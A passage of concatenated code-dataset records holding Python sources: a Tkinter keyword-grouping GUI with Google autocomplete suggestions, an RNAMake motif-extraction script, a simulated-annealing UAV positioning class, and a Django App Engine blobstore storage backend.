parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame to hold buttons\n\t\tbuttonFrame = Frame(parent.importListFrame, bg=\"#E8E8E8\", relief=FLAT, borderwidth=2)\n\t\tbuttonFrame.pack(fill=BOTH, side=BOTTOM, anchor=SW)\n\n\t\t#Construct Button Frame Grid\n\t\tbuttonFrame.grid_rowconfigure(0, weight=1)\n\t\tbuttonFrame.grid_rowconfigure(1, weight=1)\n\n\t\tbuttonFrame.grid_rowconfigure(0, weight=1)\n\t\tbuttonFrame.grid_rowconfigure(1, weight=1)\n\n\t\tbutton1 = Button(buttonFrame, text=\"Get Keywords\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.fill_list)\n\t\tbutton1.grid(row=0, column=0, sticky=NW)\n\n\t\tbutton2 = Button(buttonFrame, text=\"Clear List\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.del_list)\n\t\tbutton2.grid(row=0, column=1, sticky=NE)\n\n\t\tbutton3 = Button(buttonFrame, text=\"Delete Item\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.del_word)\n\t\tbutton3.grid(row=1, column=0)\n\n\t\tbutton4 = Button(buttonFrame, text=\"Process\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.makeGroups)\n\t\tbutton4.grid(row=1, column=1)\n\n\nclass Groups(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame for keyword groups\n\t\tgroupFrame = Frame(root, relief=RAISED, bg=\"#E8E8E8\")\n\t\tgroupFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\n\t\tgroupHeader = Label(groupFrame,text='Keyword Groups', \n\t\t\t\tfont=(\"Helvetica\",24),pady=10, bg=\"#E8E8E8\")\n\t\tgroupHeader.pack(fill=BOTH, expand = True, side=TOP)\n\n\t\t#Canvas for keyword groups\n\t\tgroupCanvas = Canvas(groupFrame, bg='black', width=100, relief=SUNKEN)\n\t\tgroupCanvas.pack(fill=BOTH, expand=True, side=TOP)\n\n\t\t#Scrollbar for Group List\n\t\tgroupScroll = Scrollbar(groupCanvas, bg=\"#E8E8E8\")\n\t\tgroupScroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Group list is a listbox that will display the Keyword Group Dict\n\t\tself.groupList = Listbox(groupCanvas, bd=1, height=15, width=25, relief=SUNKEN)\n\t\tself.groupList.bind(\"<<ListboxSelect>>\", self.parent.onselect)\n\n\t\t#Delete 
Key for Removing Keyword Groups\n\t\tself.groupList.bind(\"<Delete>\", self.parent.del_group_key)\n\n\t\t#Double click to add keywords to selected group\n\t\tself.groupList.bind(\"<Double-Button-1>\", self.parent.add_keyword_dc)\n\t\tself.groupList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the Keyword Groups\n\t\tself.groupList.config(yscrollcommand=groupScroll.set)\n\t\tgroupScroll.config(command=self.groupList.yview)\n\n\t\t#Delete Button\n\t\tgrpDel = Button(groupFrame, width=10, text=\"Delete Group\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.del_group)#command=lambda groupList=groupList: groupList.delete(ANCHOR))\n\t\tgrpDel.pack(side=BOTTOM)\n\n\t\t#Add Group Button that creates a pop up to add a group\n\t\tgrpAdd = Button(groupFrame, width=10, text=\"Add Group\", highlightbackground='#E8E8E8',\n\t\t\tcommand=parent.group_window)\n\t\tgrpAdd.pack(side=TOP)\n\nclass Keywords(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\tklFrame = Frame(root, relief=RAISED, bg=\"#E8E8E8\")\n\t\tklFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\n\t\t#Header text for the keyword list \n\t\tklHeader = Label(klFrame,text='Keywords', \n\t\t\t\tfont=(\"Helvetica\",24),pady=10, bg=\"#E8E8E8\")\n\t\tklHeader.pack(fill=BOTH, expand = True, side=TOP)\n\n\t\t#Canvas for keyword groups\n\t\tklCanvas = Canvas(klFrame, bg='black', width=100, relief=SUNKEN)\n\t\tklCanvas.pack(fill=BOTH, expand=True)\n\n\t\t#Scrollbar for Group List\n\t\tkwScroll = Scrollbar(klCanvas)\n\t\tkwScroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Group list is a listbox that will display the Keyword Group Dict\n\t\tself.kwList = Listbox(klCanvas, bd=1, height=15, width=25, relief=SUNKEN, selectmode=\"extended\")\n\t\tself.kwList.bind(\"<Delete>\",self.parent.del_kw_key)\n\t\tself.kwList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the Keyword Groups\n\t\tself.kwList.config(yscrollcommand=kwScroll.set)\n\t\tkwScroll.config(command=self.kwList.yview)\n\n\t\t#Delete kw Button\n\t\tkwDel = Button(klFrame, width=15, text=\"Delete Keyword\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.del_kw)#command=lambda kwList=kwList: kwList.delete(ANCHOR))\n\t\tkwDel.pack(side=BOTTOM)\n\n\t\t#Button to initiate popup to add keywords to group\n\t\taddKw = Button(klFrame, width=15, text=\"Add Keyword\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.keyword_window)\n\t\taddKw.pack(side=TOP)\n\nclass Add_Keywords(Frame):\n\tdef __init__(self, parent, app):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tparent.title = \"Add Keywords\"\n\t\tself.app = app\n\n\t\t#Frame to hold keyword list text\n\t\tkwTextFrame = Frame(self.parent, bg=\"#E8E8E8\", relief=RAISED)\n\t\tkwTextFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=10, pady=10)\n\n\t\t#Canvas for keyword list text\n\t\tkwgroupCanvas = Canvas(kwTextFrame, bg=\"#E8E8E8\", width=100, relief=SUNKEN)\n\t\tkwgroupCanvas.pack(fill=BOTH, expand=True)\n\n\t\t#Keyword list text box\n\t\tkwText = ScrolledText(kwgroupCanvas, wrap=WORD, width=25, \n\t\t\theight=15, relief=SUNKEN, highlightthickness=0, bd=1, padx=1, pady=1)\n\t\tkwText.pack(fill=BOTH, side=BOTTOM, expand=True)\n\n\t\t#@add_wrapper\n\t\tdef add_kw():\n\t\t\t#Find current group selected\n\t\t\t\tcurrent_word = self.app.group_select\n\n\t\t\t\t#Get text from add keywords text box\n\t\t\t\ttext = kwText.get('1.0', 'end-1c').splitlines()\n\t\t\t\tfor line in 
text:\n\t\t\t\t\tself.app.key_group.keyword_groups[current_word].append(line)\n\n\t\t\t\tkwText.delete('1.0',END)\n\t\t\t\treturn text\n\n\t\t#Add Keyword Button\n\t\tadd_key = Button(kwTextFrame, width=15, text=\"Add Keyword(s)\", \n\t\t\thighlightbackground=\"#E8E8E8\", command=add_kw)\n\t\tadd_key.pack(side=BOTTOM)\n\nclass Add_Group(Frame):\n\tdef __init__(self, parent, app):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.app = app\n\n\t\t#Frame to hold Keyword Group new Entry and new keywords text box\n\t\taddKGFrame = Frame(parent, bg=\"#E8E8E8\", relief=RAISED)\n\t\taddKGFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=10, pady=10)\n\n\t\t#Label for Entry Box\n\t\taddGroupLabel = Label(addKGFrame, text=\"Enter New Group Name\",bg=\"#E8E8E8\")\n\t\taddGroupLabel.pack(side=TOP)\n\n\t\t#Entry Box for new Keyword Group\n\t\tself.addGroup = Entry(addKGFrame, width=30, relief=SUNKEN)\n\t\tself.addGroup.pack(side=TOP, fill=X, expand=True, pady=5)\n\n\t\t#Label for New Keywords for Group Text Box\n\t\taddKGLabel = Label(addKGFrame, text=\"Enter New Keywords (Optional)\",bg=\"#E8E8E8\")\n\t\taddKGLabel.pack(side=TOP, fill=X, expand=True, pady=5)\n\n\t\t#Canvas for Text Box to Enter New Keywords for New Group\n\t\taddKGCanvas = Canvas(addKGFrame, bg=\"#E8E8E8\", relief=SUNKEN)\n\t\taddKGCanvas.pack(side=TOP, fill=BOTH, expand=True, pady=5)\n\n\t\t#Keywords for new group scrollable text box\n\t\tself.addKGText = ScrolledText(addKGCanvas, wrap=WORD, width=25, \n\t\t\theight=15, relief=SUNKEN, highlightthickness=0, bd=1, padx=1, pady=1)\n\t\tself.addKGText.pack(fill=BOTH, side=TOP, expand=True)\n\n\t\t#Button to add new Keyword Group and Keywords\n\t\taddKGButton = Button(addKGFrame, text=\"Add Group\", \n\t\t\twidth=30, highlightbackground='#E8E8E8', command=self.group_add)\n\t\taddKGButton.pack(side=TOP, fill=BOTH, expand=True)\n\n\t#Function to add the keyword group\n\tdef group_add(self):\n\t\tnewGroup = self.addGroup.get()\n\t\tif newGroup != \"\":\n\t\t\tself.app.key_group.keyword_groups[newGroup] = []\n\n\t\t\ttext = self.addKGText.get('1.0', 'end-1c').splitlines()\n\t\t\tfor line in text:\n\t\t\t\tself.app.key_group.keyword_groups[newGroup].append(line)\n\t\t\tself.app.Groups.groupList.delete(0, END)\n\t\t\tfor x in self.app.key_group.keyword_groups:\n\t\t\t\tself.app.Groups.groupList.insert(END, '%s' % x)\n\n\t\t\tself.addKGText.delete('1.0', END)\n\t\t\tself.addGroup.delete(0, END)\n\nclass MainApplication(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.Import = ImportList(self)\n\t\tself.Buttons = Buttons(self.Import)\n\t\tself.Groups = Groups(self)\n\t\tself.Keywords = Keywords(self)\n\t\tself.parent = parent\n\t\tself.menubar = Menu(self)\n\t\tself.parent.config(bg=\"#E8E8E8\")\n\n\t#HELPER VARIABLES AND OBJECT DECLARATIONS-----------------\n\t\t\n\t\tself.group_select = None #Keeps track of currently selected keyword group\n\t\tself.key_group = word_grouper(\"z\",\"a\") #Declare Keyword Group Object which does the backend work\n\t\tself.suggest_keywords = defaultdict(lambda: []) #Keep track of words for which we have already scraped Google\n\n\t#END HELPERS---------------------------------------------\n\n\t\tself.Import.pack(fill=BOTH, expand=True, side=LEFT)\n\t\tself.Buttons.pack(fill=BOTH, side=BOTTOM, anchor=SW)\n\t\tself.Groups.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\t\tself.Keywords.pack(fill=BOTH, expand=True, side=LEFT, padx=50, 
pady=50)\n\n\t#MENU---------------------------------------------------------\n\n\t\tself.filemenu = Menu(self.menubar, tearoff=0)\n\t\tself.filemenu.add_command(label=\"Import\", command = self.fill_list)\n\t\tself.filemenu.add_command(label=\"Export\", command = self.exp_file)\n\t\tself.filemenu.add_command(label=\"Export As CSV\", command = self.exp_csv)\n\t\tself.filemenu.add_separator()\n\t\tself.filemenu.add_command(label=\"Exit\", command = self.parent.quit)\n\t\tself.menubar.add_cascade(label=\"File\", menu=self.filemenu)\n\n\t\tself.editmenu = Menu(self.menubar, tearoff=0)\n\t\tself.editmenu.add_command(label = \"Split Keywords\", command = self.makeGroups) #same as process button\n\t\tself.editmenu.add_command(label = \"Clear Import List\", command = self.del_list)\n\t\tself.editmenu.add_command(label = \"Clear All\", command = self.clear_all) #erase everything\n\t\tself.editmenu.add_command(label=\"Get Google Suggestions\", \n\t\t\t\t\t\t\tcommand = lambda: self.get_suggestions('http://google.com/complete/search?output=toolbar&q=',\n\t\t\t\t\t\t\tself.suggest_keywords))\n\t\tself.menubar.add_cascade(label=\"Edit\", menu=self.editmenu)\n\n\t\tself.groupmenu = Menu(self.menubar, tearoff=0)\n\t\tself.groupmenu.add_command(label = \"Add Keyword Group\", command = self.group_window)\n\t\tself.groupmenu.add_command(label = \"Delete keyword Group\", command = self.del_group)\n\t\tself.groupmenu.add_separator()\n\t\tself.groupmenu.add_command(label = \"Add Keyword(s)\", command = self.keyword_window)\n\t\tself.groupmenu.add_command(label = \"Delete Keyword(s)\", command = self.del_kw)\n\t\tself.menubar.add_cascade(label=\"Keywords\", menu=self.groupmenu)\n\n\t\tself.parent.config(menu=self.menubar)\n\n\t#END MENU-----------------------------------------------------\n\n\t#TOP LEVEL WINDOWS--------------------------------------------\n\t\n\tdef keyword_window(self):\n\t\tself.newWindow = Toplevel()\n\t\tself.newWindow.config(bg=\"#E8E8E8\")\n\t\tself.key_pop = Add_Keywords(self.newWindow, self)\n\t\tself.newWindow.wm_title(\"Add Keywords\")\n\n\tdef group_window(self):\n\t\tself.newWindow = Toplevel()\n\t\tself.newWindow.config(bg=\"#E8E8E8\")\n\t\tself.key_pop = Add_Group(self.newWindow, self)\n\t\tself.newWindow.wm_title(\"Add Groups\")\n\n\t#END TOP LEVEL WINDOWS----------------------------------------\n\n\t#IMPORT LIST BUTTON FUNCTIONS---------------------------------\n\n\tdef fill_list(self):\n\t\tftypes = [('Text files', '*.txt')]\n\t\tdlg = tkFileDialog.Open(root, filetypes = ftypes)\n\t\tfl = dlg.show()\n\t\tself.key_group.in_file = fl\n\n\t\tif fl != '':\n\t\t\tx = open(fl,\"r\")\n\t\t\tfor line in x:\n\t\t\t\tself.Import.importList.insert(END, line)\n\t\t\t\tself.key_group.gui_wordlist.append(\"%s\" % line)\n\n\tdef del_word(self):\n\t\t#Get current importList selection\n\t\tselection = self.Import.importList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Import.importList.get(selection[-1-i])\n\t\t\tself.key_group.gui_wordlist.remove(value)\n\t\t\tself.Import.importList.delete(selection[-1-i])\n\n\tdef del_word_key(self, event):\n\t\t#Get current importList selection\n\t\tselection = self.Import.importList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Import.importList.get(selection[-1-i])\n\t\t\tself.key_group.gui_wordlist.remove(value)\n\t\t\tself.Import.importList.delete(selection[-1-i])\n\n\n\tdef del_list(self):\n\t\tself.Import.importList.delete(0, END)\n\t\tself.key_group.gui_wordlist = []\n\n\tdef 
makeGroups(self):\n\t\tself.key_group.gui_input()\n\t\tself.key_group.make_groups()\n\t\tself.key_group.make_keywords()\n\n\t\tself.Groups.groupList.delete(0, END)\n\t\tfor x in self.key_group.keyword_groups:\n\t\t\tself.Groups.groupList.insert(END, \"%s\" % x)\n\t\tself.Import.importList.delete(0, END)\n\t\tself.key_group.renew()\n\n\t#END IMPORT LIST BUTTON FUNCTIONS---------------------------------\n\n\t#MENU FUNCTIONS---------------------------------------------------\n\n\t#Export Keywords to File\n\tdef exp_file(self):\n\t\tf = tkFileDialog.asksaveasfile(mode='w', defaultextension=\".txt\")\n\t\tif f is None:\n\t\t\treturn\n\t\tfor key in self.key_group.keyword_groups:\n\t\t\tself.key_group.keyword_groups[key] = set(self.key_group.keyword_groups[key])\n\t\t\tf.write(\"------------- \\n\")\n\t\t\tf.write(key+\"\\n\")\n\t\t\tf.write(\"------------- \\n\")\n\t\t\tfor value in self.key_group.keyword_groups[key]:\n\t\t\t\tkwords = value\n\t\t\t\tf.write(value+\"\\n\")\n\t\tf.close()\n\n\tdef exp_csv(self):\n\t\tin_path = tkFileDialog.asksaveasfilename(defaultextension=\".csv\")\n\t\tself.key_group.write_to_csv(in_path)\n\n\tdef get_suggestions(self,URL, suggest_keywords):\n\t\tqry = self.group_select\n\t\tif suggest_keywords[qry] == []:\n\t\t\tfor a in Suggest.google_az_suggestions(URL,qry):\n\t\t\t\tsuggest_keywords[qry].append(a)\n\t\tSuggestions.suggest_window(suggest_keywords[qry],self.key_group.keyword_groups[qry])\n\n\tdef clear_all(self):\n\t\tself.Import.importList.delete(0, END)\n\t\tself.Keywords.kwList.delete(0, END)\n\t\tself.Groups.groupList.delete(0, END)\n\t\tself.key_group.refresh()\n\n\t#END MENU FUNCTIONS-----------------------------------------------\n\n\t#KEYWORD LIST FUNCTIONS-------------------------------------------\n\n\t#Del kw Button function\n\tdef del_kw(self):\n\t\t#Find what word group is currently selected with the variable group_select\n\t\tcurrent_word = self.group_select\n\t\t#Get current self.Keywords.kwlist selection\n\t\tselection = self.Keywords.kwList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Keywords.kwList.get(selection[-1-i])\n\t\t\tself.Keywords.kwList.delete(selection[-1-i])\n\t\t\tself.key_group.keyword_groups[current_word].remove(str(value))\n\n\t#Del kw Key function\n\tdef del_kw_key(self, event):\n\t\t#Find what word group is currently selected with the variable group_select\n\t\tcurrent_word = self.group_select\n\t\t#Get current self.Keywords.kwlist selection\n\t\tselection = self.Keywords.kwList.curselection()\n\t\tfor i in range(len(selection)):\n\t\t\tvalue = self.Keywords.kwList.get(selection[-1-i])\n\t\t\tself.Keywords.kwList.delete(selection[-1-i])\n\t\t\tself.key_group.keyword_groups[current_word].remove(str(value))\n\n\t#END KEYWORD LIST FUNCTIONS---------------------------------------\n\n\t#GROUP LIST FUNCTIONS---------------------------------------------\n\n\tdef onselect(self, event):\n\t\t#Tkinter passes an event object to onselect()\n\t\tself.Keywords.kwList.delete(0, END)\n\t\tw = event.widget\n\t\tindex = int(w.curselection()[0])\n\t\tvalue = w.get(index)\n\t\t\n\t\tself.group_select = value\n\n\t\t#Creates even/odd gray/white bg colors\n\t\ti = 0\n\t\tfor word in self.key_group.keyword_groups[value]:\n\t\t\tif i % 2 == 0:\n\t\t\t\tself.Keywords.kwList.insert(END, word)\n\t\t\t\tself.Keywords.kwList.itemconfig(i,bg=\"#EBECF5\")\n\t\t\telse:\n\t\t\t\tself.Keywords.kwList.insert(END, word)\n\t\t\ti += 1\n\n\t#Delete Group Button 
Function\n\tdef del_group(self):\n\t\tselection = self.Groups.groupList.curselection()\n\t\tvalue = self.Groups.groupList.get(selection[0])\n\t\tdel self.key_group.keyword_groups[value]\n\t\tself.Groups.groupList.delete(ANCHOR)\n\t\t#Clear selected Groups self.Keywords.KwList\n\t\tself.Keywords.kwList.delete(0, END)\n\n\t#Delete Group Key Function\n\tdef del_group_key(self, event):\n\t\tselection = self.Groups.groupList.curselection()\n\t\tvalue = self.Groups.groupList.get(selection[0])\n\t\tdel self.key_group.keyword_groups[value]\n\t\tself.Groups.groupList.delete(ANCHOR)\n\t\t#Clear selected Groups self.Keywords.KwList\n\t\tself.Keywords.kwList.delete(0, END)\n\n\t#Call Popup for Keyword Adding from double click on KW group\n\tdef add_keyword_dc(self, event):\n\t\tself.keyword_window()\n\n\t#END GROUP LIST FUNCTIONS-----------------------------------------\n\nif __name__ == '__main__':\n\troot = Tk()\n\tapp = MainApplication(root)\n\troot.wm_title(\"Keyword Grouper\")\n\troot.mainloop()", "repo_name": "Cmiller9/KW_GRPR", "sub_path": "Keyword_Grouper/KwGui.py", "file_name": "KwGui.py", "file_ext": "py", "file_size_in_byte": 17287, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keywordGroupObject.word_grouper", "line_number": 264, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 265, "usage_type": "call"}, {"api_name": "tkFileDialog.Open", "line_number": 325, "usage_type": "call"}, {"api_name": "tkFileDialog.asksaveasfile", "line_number": 373, "usage_type": "call"}, {"api_name": "tkFileDialog.asksaveasfilename", "line_number": 387, "usage_type": "call"}, {"api_name": "Scraper.Suggest.google_az_suggestions", "line_number": 394, "usage_type": "call"}, {"api_name": "Scraper.Suggest", "line_number": 394, "usage_type": "name"}, {"api_name": "Scraper.Suggestions.suggest_window", "line_number": 396, "usage_type": "call"}, {"api_name": "Scraper.Suggestions", "line_number": 396, "usage_type": "name"}]} +{"seq_id": "29491243682", "text": "#!/usr/bin/env python\n\nimport argparse\n\nfrom rnamake import resource_manager as rm\nfrom rnamake import util, motif\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description='')\n\n    parser.add_argument('-pdb', help='path to pdb', required=True)\n    parser.add_argument('-name', required=False)\n    parser.add_argument('-n', required=False)\n    args = parser.parse_args()\n    return args\n\nargs = parse_args()\n\nfname = util.filename(args.pdb)\n\nname = fname[:-4]\nif args.name:\n    name = args.name\n\nrm.manager.add_motif(path=args.pdb, name=name, include_protein=1, align=0)\nm = rm.manager.get_motif(name=name)\n\nf = open(name + ".motif", "w")\nf.write(m.to_str())\nf.close()", "repo_name": "zhuoyuzhang/RNAMake", "sub_path": "rnamake/bin/RNAMake.get_motif_from_pdb.py", "file_name": "RNAMake.get_motif_from_pdb.py", "file_ext": "py", "file_size_in_byte": 678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "rnamake.util.filename", "line_number": 19, "usage_type": "call"}, {"api_name": "rnamake.util", "line_number": 19, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.add_motif", "line_number": 25, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 25, 
"usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 26, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 26, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "828026564", "text": "import math\nfrom random import Random\nimport numpy as np\n\nfrom Events.Game.move.algos.GameObjects.data_lists.Result_list import Result_list\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.map_ranges_tools import is_in_bondaries\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.point import Point\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.settings import Settings\nfrom Events.Game.move.algos.GameObjects.uav import Uav\nfrom Events.Game.move.check import check_if_cell_is_on_map\nfrom Events.Game.move.get_position import get_random_position_on_tier1\nimport typing\n\nfrom Events.Game.move.zones import get_zone_index\n\n\nclass Annealing_Algo():\n def __init__(self,settings:Settings,rand:Random):\n\n\n self.temperature=settings.temperature\n self.temperature_reduction=settings.temperature_reduction\n\n self.iterations_form_last_temperature_update=-1\n self.last_metropolis=0\n self.last_x=0\n self.last_decison=1\n self.randm_np=None\n init_start1_x=None\n self.settings=settings\n init_start2_x=None\n self.not_accepted_counter=0\n self.rand=None\n self.av_pts_new=0\n self.diff=0\n self.is_rand_choose=False\n self.all_accepted_results=[]\n if rand!=None:\n self.randm_np=np.random.RandomState()\n self.randm_np.seed(rand.randint(0,200000))\n self.rand=rand\n init_start1_x=rand.random()*settings.map_size_x\n init_start2_x=rand.random()*settings.map_size_x\n self.current_result={\"position\":[Point(init_start1_x,settings.tier1_distance_from_intruder),Point(init_start2_x,settings.tier1_distance_from_intruder)], \"points\":0}\n self.step=self.settings.annealing_step\n\n\n self.annealing_number_of_iterations=settings.annealing_number_of_iterations\n self.can_terget_be_changed=True\n\n\n def un_register_attack(self, candidate_points,candidate_positions:typing.List[Point],settings:Settings,result_list:Result_list):\n\n current_points=result_list.get_current_points_from_full_map(self.current_result[\"position\"][0],self.current_result[\"position\"][1])\n self.current_result[\"points\"]=current_points\n self.iterations_form_last_temperature_update=self.iterations_form_last_temperature_update+1\n if self.iterations_form_last_temperature_update>=self.annealing_number_of_iterations:\n self.iterations_form_last_temperature_update=0\n self.temperature=self.temperature*self.temperature_reduction\n # self.step=self.step*self.temperature_reduction\n self.not_accepted_counter=0\n\n\n\n self.av_pts_new=candidate_points\n\n value_delta=candidate_points-self.current_result[\"points\"]\n self.diff=candidate_points-self.current_result[\"points\"]\n metropolis=math.exp(-abs(value_delta) / self.temperature)\n x=self.rand.random()\n self.last_decison=0\n self.last_x=x\n self.last_metropolis=metropolis\n if value_delta>0:\n self.last_metropolis=1\n if (value_delta>0 or (x 65: #shorten it so extension fits in FileField\n name = name.split(\".\")[0][:60].rstrip() + u'.' + name.split(\".\")[1]\n logger.info(name)\n logger.info('Returning ' + str(data) + name )\n return '%s/%s' % (data, name)\n\n else:\n raise ValueError(\"The App Engine Blobstore only supports BlobInfo \"\n \"values. Data can't be uploaded directly. 
You have to \"\n \"use the file upload handler.\")\n\n def delete(self, name):\n delete(self._get_key(name))\n\n def exists(self, name):\n return self._get_blobinfo(name) is not None\n\n def size(self, name):\n return self._get_blobinfo(name).size\n\n def url(self, name):\n try:\n return get_serving_url(self._get_blobinfo(name))\n except NotImageError:\n return None\n\n def created_time(self, name):\n return self._get_blobinfo(name).creation\n\n def get_valid_name(self, name):\n return force_unicode(name).strip().replace('\\\\', '/')\n\n def get_available_name(self, name):\n return name.replace('\\\\', '/')\n\n def _get_key(self, name):\n return BlobKey(name.split('/', 1)[0])\n\n def _get_blobinfo(self, name):\n return BlobInfo.get(self._get_key(name))\n\nclass BlobstoreFile(File):\n\n def __init__(self, name, mode, storage):\n logger.info('BlobstoreFile__init on ' + name)\n self.name = name\n self._storage = storage\n self._mode = mode\n self.blobstore_info = storage._get_blobinfo(name)\n\n @property\n def size(self):\n return self.blobstore_info.size\n\n def write(self, content):\n raise NotImplementedError()\n\n @property\n def file(self):\n if not hasattr(self, '_file'):\n self._file = BlobReader(self.blobstore_info.key())\n return self._file\n\nclass BlobstoreFileUploadHandler(FileUploadHandler):\n \"\"\"\n File upload handler for the Google App Engine Blobstore.\n \"\"\"\n\n def new_file(self, *args, **kwargs):\n \"\"\"field_name, file_name, content_type, content_length, charset=None\"\"\"\n\n logger.debug('BlobstoreFileUploadHandler.new_file')\n super(BlobstoreFileUploadHandler, self).new_file(*args, **kwargs)\n\n blobkey = FindBlobKey(self.request.body)\n self.active = blobkey is not None\n if self.active:\n self.blobkey = BlobKey(blobkey)\n raise StopFutureHandlers()\n\n def receive_data_chunk(self, raw_data, start):\n \"\"\"\n Add the data to the StringIO file.\n \"\"\"\n if not self.active:\n return raw_data\n\n def file_complete(self, file_size):\n \"\"\"\n Return a file object if we're activated.\n \"\"\"\n logger.info('BlobstoreFileUploadHandler.file_complete')\n if not self.active:\n logger.info('not active')\n return\n return BlobstoreUploadedFile(\n blobinfo=BlobInfo(self.blobkey),\n charset=self.charset)\n\nclass BlobstoreUploadedFile(UploadedFile):\n \"\"\"\n A file uploaded into memory (i.e. stream-to-memory).\n \"\"\"\n\n def __init__(self, blobinfo, charset):\n logger.info('BlobstoreUploadedFile.__init__ %s' % blobinfo.content_type)\n super(BlobstoreUploadedFile, self).__init__(\n BlobReader(blobinfo.key()), blobinfo.filename,\n blobinfo.content_type, blobinfo.size, charset)\n self.blobstore_info = blobinfo\n\n def open(self, mode=None):\n pass\n\n def chunks(self, chunk_size=1024 * 128):\n self.file.seek(0)\n while True:\n content = self.read(chunk_size)\n if not content:\n break\n yield content\n\n def multiple_chunks(self, chunk_size=1024 * 128):\n return True\n\n#Djangoappengine license:\n\n#Copyright (c) Waldemar Kornewald, Thomas Wanschik, and all contributors.\n#All rights reserved.\n#\n#Redistribution and use in source and binary forms, with or without modification,\n#are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. 
Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of All Buttons Pressed nor\n# the names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS' AND\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n#ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n", "repo_name": "tarhata/sjfnw", "sub_path": "sjfnw/grants/storage.py", "file_name": "storage.py", "file_ext": "py", "file_size_in_byte": 7205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "django.core.files.storage.Storage", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.files.base.File", "line_number": 36, "usage_type": "argument"}, {"api_name": "mimetypes.guess_type", "line_number": 38, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore.create", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore", "line_number": 39, "usage_type": "attribute"}, {"api_name": "google.appengine.api.files", "line_number": 39, "usage_type": "name"}, {"api_name": "google.appengine.api.files.open", "line_number": 43, "usage_type": "call"}, {"api_name": "google.appengine.api.files", "line_number": 43, "usage_type": "name"}, {"api_name": "google.appengine.api.files.finalize", "line_number": 47, "usage_type": "call"}, {"api_name": "google.appengine.api.files", "line_number": 47, "usage_type": "name"}, {"api_name": "google.appengine.api.files.blobstore.get_blob_key", "line_number": 49, "usage_type": "call"}, {"api_name": "google.appengine.api.files.blobstore", "line_number": 49, "usage_type": "attribute"}, {"api_name": "google.appengine.api.files", "line_number": 49, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 55, "usage_type": "name"}, 